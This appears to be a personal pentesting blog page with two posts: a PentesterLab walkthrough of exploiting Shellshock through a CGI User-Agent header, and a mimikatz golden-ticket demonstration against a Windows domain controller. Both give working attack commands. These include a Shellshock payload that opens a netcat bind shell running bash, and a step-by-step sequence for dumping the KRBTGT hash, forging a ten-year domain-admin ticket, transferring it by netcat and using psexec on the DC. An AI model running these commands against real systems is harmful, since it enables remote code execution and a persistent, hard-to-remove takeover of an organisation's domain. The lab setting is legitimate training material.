Exploiting Shellshock - Pentesterlab.com

I like to keep my skills sharp, often, I find myself downloading VM from vulnhub.com but often I spend more time fixing or trying to get the VM running rather than actually practicing pentesting. Then, I found this site; www.pentesterlab.com. The material is very well organized with videos and explanation on solving each puzzle/challenge. I especially like the fact I can download the iso into my vmware and get it running without problems.

I'm working my way in the Essential lab at the moment, here is a sample exercise I got permission by Louis Nyffenegger to repost.

CVE-2014-6271/Shellshock

This is not a new vulnerability, it was reported some years back and it hit practically any Linux or Unix Operating System that was running bash. It is a simple vulnerability to exploit, you just need a web browser and an app proxy such as burp.

Here I am just going to give a summary of how to exploit a linux webserver running cgi app. Note, that shellshock exploit vector is not limited to web alone, it can be done via ssh, telnet, some cases ftp. For this example, we will inject the vuln code via the user-agent header. You will need to intercept the request and send it to a repeater:

As you can see, on the right pane indicates some json formatted output of a linux server uptime. Also, the uri is pointing to a 'status' script. This is a good indicator for shellshock exploitation. Let's try to injecting a simple code into the user-agent header:

() { :;}; /sbin/ifconfig

I tried other commands such as whoami, id but it nothing appeared, that is why it is important to test different commands and see which ones work. With positive visual from the ifconfig cmd, I will now try to use netcat to listen at port 1234 on the victim machine :) Always remember to test the command with simpler flags to check it's working. Thankfully, this was a Linux box and usually nc supports the '-e' flag, most bsd variants don't. The complete command I used is:

() { :;}; /usr/bin/nc -lvp 1234 -e /bin/bash

The fact that the righ pane didn't return any results is a good sign, it means that the victim machine is executing netcat. Time to connect to it:

There you go! For more great web pentesting exercises like this. Please visit my friend; Louis Nyffenegger awesome website @ www.pentesterlab.com

GitHub Gist

I have some scripts at github gist if anyone is interested. You may visit it here.

Windows Credential Attack - Part 2

In my last post, I wrote about passing the hash using standard mimikatz tool. For this installment, I will demonstrate how to pass the ticket (ptt) using the same tool. PTT is a technique of backdooring a Windows Domain Controller(DC) permanently. Several advantages of PTT has over passing the hash (pth) is that it is very difficult to remove PTT backdoor because it is tied to the KRBTGT account that is built into Active Directory (AD). It was designed to manage the Kerberos Distribution Center; an essential component of Microsoft's entire single sign-on ecosystem. Resetting it will not remove it, neither will reinstalling/promoting a new DC using the same domain objects. Hence, why the name, 'golden ticket' was given. It also comes with default 'Domain Admin' privileges and 10 years validity period!!! You virtually have full control of  the domain/forest, allowing you to manipulate any objects managed by the DC. Also, the userid created using this technique is not listed in the standard AD listing! You practically have God-like control over the entire enterprise domain!

In a nutshell, what I did was identify and dump the hash that identifies KRBTGT. Created a malicious ticket called 'hacker4' associating it with the corresponding sid/domain. After which, I saved it and transfered it to 'client-pc' using netcat and loaded in back into memory. I did a short video to demonstrate a simple technique using a windows client pc (client-pc) and a Windows 2008 Domain Controller (server-dc). The tough job is obtaining SYSTEM privilege on server-dc to run mimikatz which is out of scope of this post.

Summary of commands:

Steps On server-dc

privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /admin:hackerboy /domain:bubblegum.com /sid:S-1-5-21-4052271652-3634189325-3875401421 /krbtgt:409adfdd28b38f3decff6609fe0a19a1 
nc 10.0.0.234 1234 < ticket.kirbi

Steps On the client-pc

nc -nlpv 1234 > ticket.kirbi
kerberos::ptt ticket.kirbi
psexec64 \\server-dc cmd.exe
whoami /groups

P.O.C Recording



* Caveat: I recommend to create golden ticket with the same name as the admin on the DC. Psexec64.exe can't seem to pass the ticket when the user you created on the DC doesn't match the ticket after reboot.

kerberos::golden /admin:administrator /domain:bubblegum.com /sid:xxxxx /krbtgt:xxxx